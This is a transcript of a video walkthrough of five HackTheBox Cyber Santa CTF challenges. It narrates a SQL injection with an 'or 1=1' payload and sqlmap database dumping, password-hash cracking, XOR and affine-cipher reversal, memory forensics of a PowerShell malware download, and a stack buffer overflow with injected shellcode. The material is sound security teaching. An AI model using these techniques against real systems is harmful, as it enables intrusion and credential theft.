Day 2 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021

Captions
In this video we're going to take a look at some of the challenges from day two of the HackTheBox Cyber Santa capture-the-flag competition. If you didn't check out day one's video, go and check it out, but essentially we've got five challenges a day for five days, one from each of these categories, and I'm going through the video in order of the number of solves. So at the moment we've got the most solves on the web challenge, and the description for it says: the evil elves have changed the admin access to Santa's toy management portal, can you get access back and save Christmas?

So we've got a Dockerfile, which is a Docker container which is launched, and we've got some files to download. If you're going to take a look here, we've got a Docker script, so we could launch the Docker if we wanted to. We can immediately see we've got a 10.5.13 MariaDB, which is interesting. We can open this up in VSCodium as well, so we can go and have a look through the code. Immediately again we'll see in the entrypoint we've got this database which is being created, so a big hint straight away about what the challenge is going to involve.

I just mentioned that whenever I was actually solving this, because all these challenges come out at once, it's kind of a race to see who can solve them first. I didn't go straight into the code here with the web challenge; actually, the web challenge I launched the Docker container for while I was starting to take a look at some of these other challenges. So, for example, the forensics file takes quite a long time to download, so start downloading that, and we can go and open up the reversing binary in Ghidra and stuff, and at the same time just launch this Docker container so that we can go and have a quick look at the web challenge and just see: is it an easy win? Can we just do admin:admin and log in, or can we do a SQL injection? So if we change this to, let me just, so you can see this, we could do or 1=1. So if there is a SQL statement there which is saying select all from
select user from, sorry, select username from users where username equals admin and where password equals this value: if we close off that SQL statement and then insert this query, it says if the username equals admin and if the password equals nothing, or if 1 equals 1, which it always will do, so this would come back true. But in this case you don't get anything. So another thing we might want to do anyway is just see if there are any other kinds of SQL injections. So that would be a SQL injection whereby, let me just do a normal query though, that would be a SQL injection whereby it would just give us an immediate login, but there are other types of SQL injection vulnerability, and if we wanted to very quickly identify one we could use sqlmap. You can use sqlmap, you can pass in a URL and some POST data or some GET parameters or something like that, but you can also, if you want to do things quickly, pass it in a POST request. So that's why we take a copy of this here, and then we'll just go and create a new .request file, save this POST request in there, and I just let sqlmap do what it needs to do. It's going to run through, it's going to try a few different types of SQL vulnerabilities here, as you can see, for different versions of SQL, and it's trying for time- and error-based injections as well. We're gonna just hit yes on all the default prompts. I've kind of gone through this before even really looking into the code, but we'll go through the code in a second as well, because it's important that we know how to approach challenges if we can't just easily identify what the vulnerability is from the website or from knowing a tool or something like that: that we can go and have a look at the code and know what's worth investigating. But if we go back to our sqlmap, we can see that it's identified a potential payload, and now we want to just run through and find out what it's come back with, the version of MySQL. What we're going to do now is just dump the
database. You can use -D to specify a database and -T to specify a table, and you can specify columns, I guess -C, etc., but I'm just going to try to dump out the entire database. Essentially what's happening here is, whenever a query is made to the database, for example if it tries to ask what is the first character of the password, and we ask is the first character of the password an "a", and if it comes back in, say, one second, we know it's true that it begins with an "a"; if it comes back in, say, two seconds, then it's false, and we can basically go and probe every character then to identify what they are. So that's why, as you can see, it's going to take quite a long time to go through this.

So let's go and take a look at the code as well. We'll want to go straight to the SQL side of things, so let's have a look at this database.js file. We can see we've got a toy DB, you can see the user here and the pass; obviously this is just the code which is set up for us, it's not going to be all the same values. We've got a function to connect to the database, we've got a function to list toys, so it's going to select all from the toys list where approved equals 1, or another value if that's sent in. We've got a loginUser function which is just going to select username from users where the username equals the user we provide and the password equals the password we provide. So this is where we're kind of saying, if we could have closed off this quote and said or 1=1, then this would have been two conditions, so as long as one of these conditions is true it would have got through to the next stage. We've also got getUser as well, which is just going to select all from users where username equals the username provided. And if we go into our database.sql we can see that the ultimate goal is going to be to retrieve the values from the toy list, because one of them is the fake flag, or the real flag on
the server, but the other items all have approved set to 1 and this one has 0, so I'm gonna need to make sure that we have that level of access as well. We can also see we've got two users, a manager and an admin; looks like MD5s. We can go and do hashid to verify that, well, to get some potential hash types, and then we could run hashcat. You can see here some examples, but we've also got the documentation up here, so there's a lot of different modes you can run depending on the hash type. In this case we're using MD5, which is mode 0, so we can do hashcat -m 0, paste in the hash and then give it a wordlist, go to the share wordlists directory, the classic is rockyou.txt. You could also use something like CrackStation. Really? Oh, that's okay, it's in the potfile for me from doing it earlier, so because it's already been cracked we can just do --show and find that that is big santa. Let's try and do that with the second; in fact, if we want to have a look at another tool we could do this with, we could also use John the Ripper. So let's create a file here, let's go and grab the other hash for the admin and we'll save that, we'll go and run john hash, give it rockyou this time. It's going to run through; in this case it should identify the hash type and give us... it didn't, okay, it actually gave the wrong type. I guess it should be this, let's try that. I don't use John as often, as you can see, but yeah, we provide the correct hash type, raw-md5, and we get back "try harder". Normally I just go to crackstation.net, to be honest, as even with my CrackStation wordlist, which I got from this site, it doesn't have the full range that are available on the CrackStation server, and they'll be able to look it up a lot quicker. We can provide up to 20 hashes from a variety of different types and that should come back. But let's go and have a look, see how... no, let's go back to the code actually before we see how that's going. So we've seen the database as well; there's not really too much else in here. We could go
and have a look through the HTML. We've got a dashboard, we've got a login, not likely to be of much interest. We're going to have a look at client-side JavaScript, but server-side is probably going to be of more interest to us to begin with. We've got some authentication here; this is again not of too much interest, but notice that it's using a JSON web token helper, you can see the helper here. So I actually thought initially, whenever I looked into the code as well, that this might have something to do with it, that it might be a two-stage challenge. Let's go and see, did I miss anything? So this is... no, routes/index.js, okay. So this is where we've got our POST /api/login, and you can see that it's creating an MD5 hash of our password, it's going to try and log in with the username and the MD5, and if we get it incorrect it'll say invalid, otherwise it's going to sign a JSON web token and allow us to log in. We've also got the GET dashboard, again not of too much interest, and we have GET toy list as well, and you can see that whenever we request the toy list it's actually going to check to make sure we're admin, and if so set approved to 0, otherwise approved to be 1. So we need to make sure we are the admin in order to be able to read these toys. I think that's about it in terms of the code; I probably flew through that maybe a bit too quick, but we know sqlmap is working for us anyway. So we can go back, we can see we've got our two MD5 hashes here, let's take these to CrackStation, and it comes back with two hashes. So we did actually have the correct hash for the manager; let's go and try and log in. Yep, we'll send that... successful, so we can log in as the manager. And if you're going to have a look here at our storage, then we will see that we have this JSON web token. We could, if this was a different vulnerability that required this, we might go and take this to jwt.io, or if you have Burp Suite here and the JSON web token extension, you can go and paste that in here and we can
see what it's comprised of, although obviously we know this from the code anyway: what algorithm it's using, and the payload has the username in it and then the time of access, and also the signature that's being used. But we need the secret key, so that might be something you go and crack, or you could try to change the algorithm to none, or there's a lot of different attacks for JSON web tokens, but in this case we have an admin password as well. So let's go and try to log in with admin, magical christmas. We log in and we get back our flag.

All right, so I probably spent about 10 minutes explaining that and showing a couple of different tools, which maybe wasn't completely necessary. You can see hashcat will also give us the option to crack the hashes, although it'll probably be quite slow; you can see that we can provide a wordlist, so we can have it actually brute force through characters. But yeah, probably spent a bit longer than we needed to; you know, it really was just a case of running sqlmap and dumping the database and then cracking the password and logging in. But I think it's worth just reviewing the code anyway and having a look at a couple of different tools we can use to crack hashes.

The next challenge is called Xmas Spirit, it's a crypto challenge, and the description says: now that the elves have taken over, Santa has lost so many letters from the kids all over the world; however, there's one kid who managed to locate Santa and send him a letter. It seems like the Xmas spirit is so strong within this kid, he was so smart they even thought of encrypting the letter in case the elves captured it. Unfortunately Santa has no idea about cryptography, can you help him read the letter? So we had two downloadable parts for this one; let's have a look, we've got an encrypted.bin and challenge.py. Don't worry about the solve script, we'll get to that shortly. And we can try to print out the encrypted.bin just to see what it looks like; actually that causes some problems with the terminal, and
let's open up the challenge.py script. We open this up and we can see we've got this encrypt function, let me maximise that. We've got an encrypt function, we've got the letter.pdf file being opened, we're calling encrypt on it, and then we're writing the encrypted.bin. So there's not too much happening here; all the stuff's happening in this encrypt function, where we have a modulus set to 256, and while True it's going to go through, it's going to grab a random integer between 1 and 256, and it's going to keep doing that until it finds a number where the greatest common divisor is equal to 1, and then it's going to break. Then it's going to assign a b, which is also going to be a random value between 1 and 256, and then it's going to go through the encryption, where each byte in the letter.pdf is going to go through this process of a times byte plus b modulus 256. The reason it's 256 is we have a range of 256 bytes, from 00 to ff, and we need to reverse this.

So there is a similar challenge which I came across; in fact, let me open up here. If we didn't know how to approach this challenge we'd probably start googling around for some similar-looking code and see how it was solved. If you do that you'll find this Baby Encryption HackTheBox write-up, and it's slightly similar code; we've got the same sort of principle. If it ever unblurs... this is the decryption, where's the encryption? Okay, so here we've got our encryption here. It's basically going through the same thing: for each char in the message it's going to first do a subtraction (ours was doing that as well, well, it's doing a plus, but it's just doing it all as one, so it's kind of similar), and then it's gonna do the multiplication and then the modulus. The difference here is all they had to do was go and reverse that algorithm and plug in the values; for us, we don't know what a and b are, so we don't know what 18 and 179 are. There are 256 bytes
possible, so we could potentially loop through, but you have a random a and a random b, so you've got 256 times 256 possibilities you could potentially loop through and brute force that. And essentially we can do a known-plaintext attack, because we know that the beginning of letter.pdf is going to have the PDF file signature. So we search "pdf magic bytes", we can go and have a look at the list of file signatures, we'll just do Ctrl+F here for PDF, and we'll see that a PDF file should begin with these characters, or these values in hex. So we know that we could go through and we could basically try to decrypt the first five characters of the encrypted.bin, see do they equal that PDF file header, and if they do continue with the encryption, if not go through to the next key. But we can do it a bit smarter than that: we can actually reverse this algorithm and try and identify what a and b are. We would also need to inverse this modular function as well on the reverse, which is something that can be done quite easily now in Python 3.8, you can just use an inverse function; otherwise, manually, this would be done using the Euclidean algorithm, extended Euclidean. So let's go and see how we can solve this.

This type of cipher is called an affine cipher, and we could go and google that and bring up some information on how we can solve it. There is a decoder; you've actually got this on CyberChef and on dcode.fr as well, which sometimes comes up in challenges, where if you know what the key is, or if you want to try and brute force, you can normally do that with these sites. Let me copy over a link which I use when trying to go through this. So, affine cipher: in an affine cipher the letters of the original message are first identified with integer values, so in this case there's 26 letters in the alphabet; our alphabet has 256 bytes in it because that's the range of bytes. And this is the function, so the encryption is going to be, to get each encrypted character, we'll do a times x plus b
modulus 26; for us that is modulus 256. And this basically goes through an example; I'll not go through all this, you can go and check out this link, and it goes through how we can recover it. So if we know some of the plaintext, if we guess a couple of the characters, or in our case we know that some of the characters are going to be PDF, then we can perform an equation to reverse that and work out what a and b are. Once we've got a and b we can just build up a decryption function. So you can go through this, go and read about affine ciphers, there's some good videos and stuff online. We could also go and try and find some similar scripts, so we could search like "affine decrypt ctf writeup" and just try and find some similar write-ups in the past where, maybe the script won't be the same, but we can go and adapt it. We could search "affine plaintext attack", "known plaintext", and see what we get. I actually came across a GitHub link whenever I searched this, although for some reason whenever I search things in... I don't seem to get... let's go to results, let's go and have a look in Google. Have a look in Google, we've got a GitHub here as well which gives us an example of basically the kind of code that we need to run here to calculate this; this is the inverse modulo, which we can do with an inverse function in Python.

What I'm going to do here, because I hate crypto, I hate talking about crypto, I hate maths, I'm going to copy over the script which I've got to solve this, and we'll talk through what we've got there and see how it runs. So paste this in here. I've kept the encrypt function in; we don't really need it here, I've just kept that in so we can compare the two functions. And we're loading in our encrypted.bin. I've also imported pwntools here; it's really not needed, but it's just so that I can use read and unhex and write, it just shortens the code a little bit. And yeah, we're going to read encrypted.bin, we're going to unhex the PDF file header which
we saw on the list of file signatures here, 25 50 etc. You could actually just put that in as text, but quite a lot of file signatures don't represent properly as characters. And then that's our known plaintext. We're then going to recover a and b using the known plaintext and the ciphertext, so as long as we have these two characters of each. You can see here we're doing ct, which is our encrypted.bin; we're subtracting the first character from the second character, and then we're going to multiply it by this inverse. We're doing the inverse modulus; as I'm saying, in Python 3.8 you can just use the inverse function to do this. And then we're subtracting the first element of the plaintext from the second element of the plaintext, this is the inverse modulus that's being done there, and then we're doing mod by 256. And then to get b we're subtracting the a that we just worked out times the first plaintext character from the first ciphertext character, mod 256, and that's recovering our key basically: we've got a and b back. As you can see why I hate doing crypto challenges, or describing crypto challenges, should I say. But we've got our key, we can now run this decrypt function, which is going to pass in our ciphertext, or encrypted.bin, and the a and the b. And this is quite simple here: we're just basically reversing this function. We don't need to do this because we're not calculating a key this time, we already know what the key is, we don't need to loop through, we've got mod already defined, so we're literally just recreating this one, we're reversing this function, and we're saying for each byte in the ciphertext, in this case we want to do this inverse of the a key, so we're doing inverse modulus on this times the byte, the encrypted byte minus b which we calculated previously, and then we're doing mod 256, and then we just add that to our results. And once the whole thing is completed then we can just write that to a PDF file. So let's try and run it. It took
about 20 seconds to run, and then if we have a look here we've now got this decrypted.pdf. So we can go and try and open it; we should be able to see, let me see if we can see a thumbnail here. We can't, actually; let's try and open it anyway, I'm just getting "loading". Okay, we can see a thumbnail. So for some reason whenever I try to load the PDF it doesn't actually load for me, I don't know, do I just need to wait for ages? But what I just did here instead was use pdftotext, or you could use some other PDF tool. If you're just searching in Kali, just do pdf and tab, you'll see you've got quite a lot here, so you can do pdftohtml, you can do pdftotext, etc. So I'm going to do pdftotext, pass in decrypted.pdf, and that's going to create a txt file which has got all of our text in it, and you can see we've got back our flag: HackTheBox, affine cipher is simple maths.

While we're looking at a crypto challenge, let me just take a second to address some questions I get about crypto. If you're not interested in this, just skip through to the next challenge, but I just thought I'd mention it because I get a lot of questions asking why I don't do crypto challenges, can I help with somebody's crypto challenge, why I don't do crypto videos, et cetera, because obviously my name is CryptoCat. CryptoCat was more just the... you know, ForensicsCat or like ReversingCat didn't really sound as good. It's not that I hate crypto, but I don't particularly enjoy it; I think it's quite heavy on maths, which I'm not a big fan of generally. But it's not that I don't have any experience with crypto: I've done a couple of crypto modules, I did one in my final year of university where we had to code DES, AES, RSA and a couple of other ciphers like Hill and Playfair cipher in Java, and we had to learn the extended Euclidean algorithm and things like that to do manually in our written exam. I then went on to help teach that module whenever I was doing my masters, which also had a crypto module, where I had to go through all that same
stuff again, but also some new algorithms like elliptic curve crypto and stuff like that. I actually did, during that module, a paper on honey encryption as well, which is a really interesting technique. If you're interested in this you can go and grab this paper: if you go to my YouTube channel, well, you're on my YouTube channel, if you go to the home page you can click on my academic profile and go and see some of the papers that I've put out. This was just kind of a practice paper as part of the coursework, but it's a really interesting technique if you're interested in learning about that. I also have a lot of notes from the time when I was doing these exams, so obviously you can see this is like five, six years ago, and I've basically avoided crypto ever since, and the reason being: this was the sort of questions that I was having to deal with, this was the sort of working out that I was doing, and to me even just looking at this stuff now gives me a headache. I really don't have much interest in learning all this stuff again, but I did learn it once; in fact I learned it more than once, I learned it basically every year whenever I had to help teach students this stuff. But nowadays I prefer working on other categories, so if you ask me to do a crypto challenge or do a crypto video, the answer is almost certainly no, and that's why.

The next challenge is called Gift Wrapping, it's a reversing challenge, and the description says: the elves won't let you inside their secret hideout without the password; luckily they've given it to you as a gift, but it seems to be wrapped up tight. So we've got a file to download; in this case I've already got it open in Ghidra, but let's go and just take a look at the file type here as well, and we'll see that it's a 64-bit LSB executable, statically linked, no section header. Let's make it executable, just to try to run it now. Let's also have a look at the strings here, let's do strings greater than 10 on giftwrap, and one of the things we'll
notice here is UPX is used. UPX is a packer; we've got UPX installed here, upx --help will tell us how we can use it, and we can use it to decompress using the -d flag. So if we go to our code, if we go over to Ghidra, you'll see we've got an entry function here, and we can go and start to have a look through this, but actually it's going to be quite obfuscated in terms of the functionality, and that's because it's been packed. So we want to unpack it; because we know what type of packer is used it won't be too difficult to do, we can just do upx -d giftwrap. It's unpacked, and now we want to import this again in Ghidra. And now if we go and have a look at the functions here we have quite a lot of functions, so it actually looks a bit harder here, but if we just know to look for the main function we can go and search for that and we'll find main. Right, oh, it's still trying to load stuff; there we go, find main and have a look. We've got some variables declared here, all set to zero, and then we've got this printf: what is the magic word? Let's go and check this out, let's run it. It asks us what's the magic word, say abc, wrong password. Okay, we could do ltrace... okay, we can't do ltrace. Let's have a look at this code then, see what's going on. So we can see we've got this local variable local_11c which is going up to 100 in hex, which is 256 in decimal; if you're not sure what it equals we can go over to the left and select it, where is it, well there's 110 anyway, that's 272.
And it's gonna basically loop then 256 times; it's going to increment each time, and it's going to set the value at local_118 plus the loop counter to equal local_118 plus loop counter XORed with 0xf3. So it looks really complicated, that, but I mean all we're really looking at there is, let me just open up some Python, all we're looking at is: for i in range(256), array[i] = array[i] XOR 0xf3. Yeah, it looks more complicated, but that's all we're looking at in that loop. So we know that it's doing some XORing with whatever we enter as the magic word, that's into local_118, and it's XORing the whole thing with f3. And then it's going to call this function, which is going to say it's running a check here, and we've got a check variable which we can go and double-click and see here on the left that it's actually a lot of hex values; you see here as well the h at the end. So we've got like 24 hex values and that's being compared with our value. So because XOR is a reversible function we can go and reverse what we have there with 0xf3 to get back our flag.

Just for anybody who's not aware of this, or has forgotten as well, how the XOR function actually works in terms of being reversible, let's just open this up in Sublime and put together a byte, a couple of bytes here. So if we have some plaintext which equals this, and we've got a key which equals, I'm just gonna put together another random value, we can do an XOR operation where we say only if one of these is a one or a zero are we gonna have a one. So this would be a one, but here we've got two zeros so that would be a zero, then we've got two ones, that'd be zero, two, one, zero, two, zero, zero, and we've got an XOR, an exclusive or, so only one of them is a one, and then zero, zero. I probably didn't pick very good values for that. The issue with XOR is that if you have any two of these three pieces of information you can always work out the third, so that means if an attacker, if we send them this ciphertext and we
send them the key, they can get the plaintext; but if we send them a ciphertext and the plaintext, they can get back the key. So let's just imagine they did that: let's say we sent them this plaintext, this ciphertext, they would just go and do that reversible operation and say zero zero one one zero zero zero one, and they've recovered the key. What we're going to do now is go and grab this value. We can go and do an XOR; you can go and do it in Python or pwntools or CyberChef. I'm gonna pick CyberChef, but I want to go and grab these check values without typing them out manually, so I'm going to set a breakpoint up around here. I'm going to grab a copy of this address, 401a04, I'm going to open this up in GDB, let's do break on the memory address, 0x... So we'll now run this, we'll say whatever, abc, and we know here then that this function is being called, check is the first parameter. So this is a 64-bit binary, so rdi, rsi, rdx is the calling convention, so the first thing we're going to want to do is print out what's in rdi, which is right here. You can do, let's do help x just to see how we can print; let me minimise this. So you can print in some different ways here; we can do like x $rdi, but we're not printing enough here, so we could do x/10x, or s depending if we want a string, or c for a char. As you can see here, for us we're going to get it as hex because not all of them will be characters that we can represent, but to make it a bit easier we can also then say the greatest size here is g, for giant, so we can do x/gx... sorry, we need to provide the register, so $rdi, and that prints that out. So let's do that, let's do four of them, and there we've got enough, we've got our full flag there. So now what I'm going to do is take these to CyberChef; we can paste these in here one by one and then we're going to want to XOR them. We want to also, before we... so we actually wanted to, well actually, one thing to just bear in mind here as well, let me
go back to Ghidra. Ghidra and CyberChef, wow, it won't let me see the input if we minimise the window. All right, well, the issue here, I'm going to double check, double-click on check again, oh god, too many windows. Yeah, the issue here, you can see here we've actually got this: a7 bb a7 b1, whereas we have this in the reverse order, so bb a7 b1, so we need to make sure that's reversed into the correct endianness. So let's also, just before we do our XOR, let's swap the endianness, and we want to make sure this is 8 as the word length. So this is looking better, bb a7 b1 etc. We want to do our XOR with 0x3, oh sorry, f3, and that's not looking good, and the reason being we're XORing hex with hex but we actually want this to be raw. So let's say from hex, we paste that in, and then we get back our flag, so HackTheBox, UPX ain't so hard. Probably a few different ways to do that, but that's how I solved it anyway. In pwntools you can very easily just do xor(a, b) and just print that, and that will XOR two values together, two strings or something like that. And you'll remember how I said that was a reversible function, so now that we have the flag, if we go and input this into the program it's gonna come back and say welcome inside, because it's taken the flag off of us, it's XORed it with 0xf3 and it's got to the third value. So as we described a minute ago, as long as we have any two pieces we can get the third, and because we had the flag in that case and the key of f3, we knew what the key was, we were able to enter in the correct password as well.

The next challenge is called Honeypot, it's a forensics challenge, and the description says: Santa really encourages people to be on his good list, but sometimes he's a bit naughty himself; he's using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise? And we're told to find the full URL used to download the malware, find
the malicious process ID, find the attacker's IP address, and then submit the flag in the format of this, where we basically need to MD5 the URL, the malicious process ID and the attacker's IP address. We've got this forensics honeypot.zip which I've already got downloaded and extracted because it's quite a big file, so we can check the file type there; we'll see it's just data. We could have a look at the strings, and there's a lot of strings in here; we might want to try and start grepping through some stuff, but if you've seen challenges like this before you'll know straight away what tool we'll need to use to analyse this. If you haven't, some hints are that it mentions here Windows 7 honeypot, we're being told to find a malicious process ID and an IP address and a URL, so these are things you typically do in a memory dump, something which can be analysed with a tool called Volatility. But if we even go to, let's go to HackTricks and just assume we didn't know what the tool was that we would be looking to use for this challenge, we could go and do a search for memory and just see what comes up. You see here we've got memory dump analysis; gonna have some problems with HackTricks here by the looks of it. And we have Volatility here as the first thing that comes up; it tells us it's an open source framework for memory dump analysis, and if we click on that we'll get the full cheat sheet on Volatility. You can see there's actually an autoVolatility which we can use to basically run through all of the Volatility plugins, which you can see the type of plugins that'll run here. We can go to Volatility's GitHub and have a look at their reference, let me have a look, actually reference, or let's go for plugins. There's a Volatility 2 and 3, by the way, and they are very different in terms of the syntax; you can see here on HackTricks that depending on the commands that you'll be using you can swap between the two different syntaxes here. One of the most notable things is in Volatility 2 you have to
identify the profile and then specify it and if you don't find a profile you'll have to develop a custom one whereas volatility 3 doesn't require that it just has generic kind of plugins so the first thing we would want to do is try to identify the image and that we can do that with image info with volatility 2 which i'm currently using so let's do volatility image info f pass in the image file might take a little while to run let's go and have a look at this reference command reference so you can see here a list of different plugins and things that we can run and you can just basically go and click on these and see what these do we've got some different categories so we can we've got stuff for analyzing the process memory for looking at process lists so we know that we need to get a process id so it's likely to be of interest to us we can also see here we can have a look at the ie history we can look at event logs we can scan for files we can dump files we can dump out processors we can dump out registry keys so we can go and analyze them in other tools like redripper for example and there's a lot of stuff we can do in here we can even access a kind of shell to start running our own commands in here so i think this is a great resource even probably better than the hat tricks here in this case because it's quite easy just to get a list of the different commands and then we just find one of interest let's say for example the ie history and we can go and see what it actually does how to scan internet caching history for urls so auto volatility is great if you're doing a ctf like this where it's kind of a race to solve the challenges the quickest that's something you can have running in the background although it does really slow down your computer because it's going to dump all of the files and processes and things like that let's go and see if we got a profile here so it says the most likely profile is this one let's go and run this again instead of image info as 
the plugin let's do let's say now are not a plugin sorry our profile is equal to this one and then the plugin we want to run let's try and do just pslist first of all which is process list um note that some of these with some of these process lists and process tree that's not the right one process tree psx view some of them will show hidden processes others won't some of them will show where processes have been spawned by other processes like this one and if we find something of interest we can go and take the process id or take the offset and go and dump it so we could create a new directory called dump and then we could say we want to proc dump d dump directory and then pass in the process id which let's say we wanted to dump this powershell.exe so that's process id 2700 we can do that and you can see okay i actually i actually dumped all of the processes there rather than the individual one okay that's fine we could do that and you can go and start grappling for strings in here or start running these checking the file types the exif data etc we also had the command line option so again i'm just kind of going from stuff that i remember from here but you could if you've not done this stuff before you could go and just start having a look through the key options in hat tricks see here we can dump environment variables for example n vars let's try that one as well you can see this one has printed out our command line and i see something of interest it's going to print out the end files there anyway so starting to print those out but notice what we had here we've got this powershell.exe has executed this it's calling those with window hidden but this is actually our base64 encoded value let's go to cyber chef paste this in from base64 and you'll see that we get our actual command here we want to take these dots out of this as well let me open this up in sublime let's replace the dots with nothing okay so you can see that it's basically going to download in this 
update.ps1 from windowsliveupdata.com this is certainly of interest to us we don't know exactly what that did but if we go back to our challenge description we're being asked what was the url used to download malware what was the malicious process id and find the attacker's ip so we have a potential url which we could enter here let's go back though and see what else we have we also had the option to check ie history let me see what else we have here we're going to be interested in some of the network stuff as well because we know that we're looking for the attacker's ip address so networking we've got a few different options here a lot of these don't actually work with the windows 7 profile but i know netscan will work for us so you can see the example output this will give us let's go back and see we've got another url here we can see santa at windowsliveupdate.com and this looks more like the sort of url we'd be expecting to see in terms of let me go back to the description once again the url used to download the malware so the malware looks like it was the update.ps1 it was a powershell script but what was the url used to actually perform the attack to begin with so we've got two potential urls anyway but this is the one that we would probably place our bets on let's go and paste this in here we know that powershell was used as well but anyway we've got uh potentially powershell pid is 2700 we've got two different urls and we need to have a look at the net scan this is going to give us all the different ip addresses so a pretty big giveaway here is this four four four four which is the default port used on a materpa payload and if if you use an ms venom i guess they'll probably provide this as a default port as well this is a pretty big hint that this is our attacker's ip address remember not the ip address that the malware was downloaded from but the attacker's ip and we basically have the flag now we've got our three different pieces of information if we do 
hack the box, and then we take our URL, underscore, 2700 (our process ID), and then the IP address, and we need to MD5 that as well. You can do that; I've got CyberChef open, so I'm just going to do that here, and this gets us the MD5 value. You could also do this from the terminal with echo -n, because we don't want a newline to be included in this, and md5sum: echo -n, we provide this as a string and then pipe that to md5sum, and we get back the same hash.

And because we didn't get to cover those in this challenge, or because we didn't need to cover them, I should say, it's also just worth mentioning some of those other features in terms of the registry. So if we extract some of these using autovolatility or using some of these commands here, we can use something like RegRipper or red shell in Linux to go and analyze the registry as well. I've done previous challenges where there has been persistence set up by malware and you need to go and dig through the registry to find it.

The last challenge is called Sleigh. It's a pwn challenge and the description says: the elves have messed up with Santa's sleigh; without it he will not be able to deliver any gifts. Help him repair it and save the holidays. We've got a service to connect to and a file to download, so let's go and get things working locally first of all. Have a look at the file type: we'll see it's not stripped, so we're going to be able to see the function names and things like that. PIE is enabled this time, so each time the program loads it's going to have a different base address. Let's just go and have a look at the full binary protections as well. If you watched yesterday's video, the day one video, we had canaries found and we had NX enabled, and we had PIE disabled, I think. So basically this is going to mean that the address is going to change each time, so it means we either need to calculate or leak the address before we're going to be able to access different offsets or different functions and variables and things in the program. But NX is disabled this time, so if there's a buffer overflow and we're able to exploit it, there are no canaries to worry about tripping off. If we're able to exploit the buffer overflow and inject some shellcode onto the stack, we'll be able to just execute our own code. Sometimes just looking at these binary protections can be a big hint as to what the challenge is actually going to involve.

Let's make this executable anyway and just try and run it. Let's do "abandon" first, just to see what it does: closes it down. Let's do "repair": you see it provides an address here. Trying to enter a value, it says could not be repaired. Let's try and run it again: you can see it provides a value, and the value is different to the one before. So because we're getting a value leaked here, we're going to want to go and try and work out what that value is. Let's just try anyway and enter a long string here to see if there is a buffer overflow. We get a segmentation fault, so there is a buffer overflow; the rest of our input has spilled over into bash. So we could identify exactly what the offset is in gdb (pwndbg). Let's open it up, generate a cyclic pattern of 500 bytes, take a copy, run the program, say we want to repair, enter that in, crash the program, and we want to go and have a look and see what's in RSP. We've got this "saaa", so let's do cyclic -l to look up the offset, and we'll find 72. So 72 bytes we need to overwrite before we're going to overwrite the return address, i.e. the instruction pointer, with an address that we're going to control.

Let's go and take a look at this in Ghidra, just so we can understand a bit better what's happening in the code. We'll go straight over to our functions and into the main function. We could have a look and see if we've got any interesting functions here. Remember we had a ret2win style challenge yesterday where there was a function, it wasn't called win or flag but it was called something else, and it basically was a win function: if we could return to that function we'd get our flag. In this case we could have a look through our functions here, but we don't have anything of interest. Let's have a look at our main function. We know it's going to do a setup, it's going to print a banner, it's going to call sleigh, which is going to do some animations I think, and then it's going to call repair if we say 1, otherwise it's going to say goodbye if we give a 2. If we go to repair, this is where the interesting code is. We can see here it's going to print out this; you can see the format specifier is %p, so it's printing out a pointer, and the value that's printed as a pointer is this data location. Sorry, not that data location, that's just the terminal output; local_48 is what's actually printed as a pointer, and local_48 is the beginning of this buffer. So it's actually leaking where the buffer is, because the buffer is going to be at a different location each time. We saw that whenever we restarted the program it had a different value, but it's telling us where the beginning of our data is going to be, so it's telling us where that is in memory, and then it's saying we can read in 0xa4 bytes, which is 164.
Reading 164 bytes into that variable, which we know the location of. So if we were to fill this up with some shellcode to execute and then overwrite this return address with the address pointing to the beginning of our shellcode, we can go ahead and execute that. 32-bit binaries work a little bit differently whenever we're developing these kinds of shellcode exploits for them, but I'll not confuse things by going into that; I've done plenty of videos on 32-bit buffer overflows and 64-bit, so you can go back and check some of those out if you're interested.

What I'm going to do here is go and have a look at some of the scripts on my GitHub. In the last challenge I grabbed a template, which I do have here on my GitHub, but typically what I actually do rather than using the template is, if I come across a challenge and it reminds me of a challenge that I've done before, I'll go and have a look at the script from that challenge and maybe just adapt that. This one immediately reminded me of Bat Computer, a HackTheBox challenge which is different, but it is leaking an address of the stack and then we're using some shellcode to get a shell or to print the flag, so it's a good starting point. Let's go and use this as a template. Let's call this exploit.py and paste this in. We don't need to update too much; as usual we're going to update the name of the binary. What's the binary called? sleigh. We'll update that. We can modify our log level if we want to. We don't really need this; we know that the offset is 72, so we could literally just type 72 in here because we found that in gdb a second ago, but I like to automate things, so we've got a function here which is going to send in those 500 cyclic bytes and we just need to update this to match the actual program syntax. So the program takes a 1 off us and then it takes the payload; it doesn't ask for a password either, so I'm going to change this and we can get rid of this stuff. Insert all these bytes, because pwntools complains at you nowadays. So we could just test this and make sure that's all working as expected. Let's comment this out, and we can see that it found the offset of 72. So it's run that, it's exploited the buffer overflow, it's looked at the core dump file and it's found out that the correct offset is 72, and it's going to use that then whenever we actually start the program and run our exploit.

Let's take away some of the stuff. We are going to be doing this 1 to begin with, and then it's going to print out that address, which we're basically just grabbing here with some regex to extract it, and we're going to print it out to make sure we've leaked the address properly. We're building up our shellcode here. I'm going to take some of this stuff out so we can just send off our payload here. In fact, oops, that wasn't what we wanted; let me just take a copy of this from our find instruction pointer function and change this to io. That's looking good. You can see I've got it set to receive a flag, because at the moment I'm catting flag.txt. This shellcraft function is basically a module; you can run this in the terminal, you can do shellcraft, and we need to provide an example of what we want. So what does it do? shellcraft -h. I think we might need to list payloads with it, so you can do shellcraft -l. You can see I never use this in the terminal, but this gives us access to all of the different functions where we can basically call Linux programs and stuff, and we're going to cat flag.txt here. This is going to generate the shellcode; I'm going to assemble it here with the asm function, but we could also do shellcraft.sh to get a shell as well, two different options. This here is to create a bit of space, which normally isn't needed on these challenges, but it was needed on the... let me see, we don't have any syntax highlighting on this to explain it, but it's basically going to pop some registers onto the stack to create some space. I can't remember exactly what happened, you need to go back and check my Bat Computer video for that, but we do need that in this case because it's quite a similar challenge.

